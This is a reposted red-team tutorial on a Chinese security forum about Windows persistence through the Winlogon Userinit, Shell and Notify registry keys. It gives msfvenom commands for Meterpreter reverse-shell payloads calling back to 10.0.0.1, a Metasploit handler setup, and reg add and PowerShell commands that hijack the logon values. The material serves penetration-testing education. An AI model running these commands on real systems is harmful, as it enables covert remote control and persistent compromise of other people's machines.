首页
社区
课程
招聘
[转帖]Persistence – Winlogon Helper DLL
发表于: 2020-2-13 10:14 2490

[转帖]Persistence – Winlogon Helper DLL

2020-2-13 10:14
2490

Original link: https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/

 

Winlogon is a Windows component which handles various activities such as the Logon, Logoff, loading user profile during authentication, shutdown, lock screen etc. This kind of behavior is managed by the registry which defines which processes to start during Windows logon. From a red team perspective these events can be the trigger that will execute an arbitrary payload for persistence.

 

The implementation of this persistence technique requires modifications of the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify

Metasploit utility “msfvenom” can be used to generate arbitrary payloads in various formats.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > pentestlab.exe

imgMetasploit – msfvenom

 

Metasploit “handler” module is required to be configured accordingly to capture the connection when the payload is executed on the target system.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
exploit

imgMetasploit – Handler Module

 

The generated executable needs to be dropped into the system (System32). Modification of the registry key “Userinit” to include the arbitrary payload will cause the system to run both executables (userinit.exe & pentestlab.exe) during Windows logon.

 

imgRegistry Key – Userinit

 

A Meterpreter session will open since the payload will executed.

 

imgMetasploit – Meterpreter

 

Similar behavior to the above has the “Shell” registry key.

 

imgRegistry Key – Shell

 

The malicious payload will executed during Windows authentication and a connection will established.

 

imgPersistence – Shell Registry Key Modification

 

The “Notify” registry key is typically found in older operating systems (prior to Windows 7) and it points to a notification package DLL file which handles Winlogon events. Replacing DLL entries under this registry key with an arbitrary DLL will cause Windows to execute it during logon. The following command can be used to generate a payload in the form of a DLL file with Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f dll > pentestlab.dll

imgMetasploit – msfvenom DLL Generation

 

The “DLLName” registry entry has been modified to contain an arbitrary DLL.

 

imgRegistry Key – Notify

 

The DLL will be executed with SYSTEM level privileges and a Meterpreter connection will open on the next Windows logon.

 

imgPersistence Notify Registry Key – Meterpreter

 

Instead of using the registry editor the following two commands can be used from an elevated command prompt in order to modify the “Shell” and “Userinit” registry entries.

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, pentestlab.exe" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, pentestlab.exe" /f

imgWinlogon Registry Keys – Command Prompt

 

Similarly PowerShell can be used for the modification of existing registry entries by using the “Set-ItemProperty” cmdlet.

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, pentestlab.exe" -Force
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, pentestlab.exe" -Force

imgWinlogon Registry Keys – PowerShell

 

References
https://attack.mitre.org/techniques/T1004/


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 2510
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2020-2-13 17:02
0
游客
登录 | 注册 方可回帖
返回
//